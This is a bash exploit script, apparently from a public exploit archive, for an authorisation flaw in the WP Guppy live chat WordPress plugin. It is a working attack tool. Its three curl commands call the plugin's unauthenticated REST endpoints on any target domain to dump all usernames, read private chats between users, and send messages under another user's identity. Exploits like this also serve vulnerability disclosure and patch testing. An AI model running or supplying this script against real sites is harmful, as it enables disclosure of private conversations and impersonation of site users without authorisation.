The plugin does not have any authorisation in some of the REST API endpoints, allowing any user to call them and could lead to sensitive information disclosure, such as usernames and chats between users, as well as be able to send messages as an arbitrary user
#!/bin/bash
#Exploit Title: Wordpress Plugin WP Guppy A live chat - WP-JSON API Sensitive Information Disclosure
#Exploit Author: Keyvan Hardani
#Date: 22/11/2021
#Vendor Homepage: https://wp-guppy.com/
#Version: up to 1.1
#Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
#Usage ./exploit.sh -h
Help()
{
# Display Help
echo "Usage"
echo
echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
echo
echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"
echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507"
echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493"
echo "-h Print this Help."
echo
}
while getopts ":h" option; do
case $option in
h) # display Help
Help
exit;;
esac
done
if [ $1 == 1 ]
then
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
fi
if [ $1 == 2 ]
then
curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool
fi
if [ $1 == 3 ]
then
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
fi